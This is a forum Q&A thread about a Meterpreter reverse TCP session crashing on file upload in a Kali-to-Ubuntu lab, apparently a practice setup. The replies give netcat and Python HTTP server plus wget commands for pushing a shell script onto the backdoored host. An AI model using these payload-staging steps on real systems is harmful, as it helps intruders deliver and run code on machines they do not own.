# Meterpreter file upload - segmentation fault

Tags: metasploit, file-upload, meterpreter

I'm doing some experiments on two VMs, one running Kali and the other running Ubuntu. I have a problem with the "upload" command of Meterpreter. In particular, I already open a reverse tcp session using the linux/x86/meterpreter_reverse_tcp payload, handling it using the exploit/multi/handler exploit.

When the session is on, I tried to upload a file.sh using the "upload" command:

```
meterpreter > upload kali/path/to/file.sh ubuntu/destination/path
```

what I receive on the Kali VM is:

```
[*] uploading  : kali/path/to/file.sh -> ubuntu/destination/path
[*] 10.0.2.15 - Meterpreter session 3 closed.  Reason: Died
```

On the the ubuntu VM I receive a Segmentation Fault error.
All the other meterpreter commands work (even the download one).
Can anyone help me understanding the problem?

Comment: Not sure about the seg fault but are you dead set on using the upload command?

Comment: My aim is to upload some files on the ubuntu machine after opening a backdoor using meterpreter. I'm not able to use the upload command as it ends up in a segmentation fault

Answer (score 0, accepted):

why not use Meterpreter to set up a netcat listener that saves the received data as a file?

ubuntu: `nc -l 4444 > file.sh` (listen for data, save to file.sh)

kali: `cat file.sh | nc [ubuntu ip] 4444` (send file.sh to specified port)

To go the opposite direction, do:

kali: `cat file.sh | nc -lp 4444` (listen for connection, serve out file.sh)

ubuntu: `nc [kali ip] 4444 > file.sh` (connect to port, save received data as file.sh)

Comment: That's a good point. Unfortunately I already tried this solution, after setting up the listener on the ubuntu machine (using the shell command of Meterpreter), when I send the file using the Kali client I receive a "connection refused" error (I even tried scp having the same result). I am sure the VMs can ping each other. The strange thing is that the opposite direction works (to move file from the Kali machine to the Ubuntu one I usually use scp).

Comment: answer updated.

Comment: Thank you Angelo, what you wrote did the job. I also found another way: I used the python module SimpleHTTPServer. In particular, I run on kali (in the directory where the .sh file was) `# python -m SimpleHTTPServer 80`. In the shell opened using meterpreter I just made wget requests ( `$ wget kali_ip/file.sh` ) and everything work also in this way.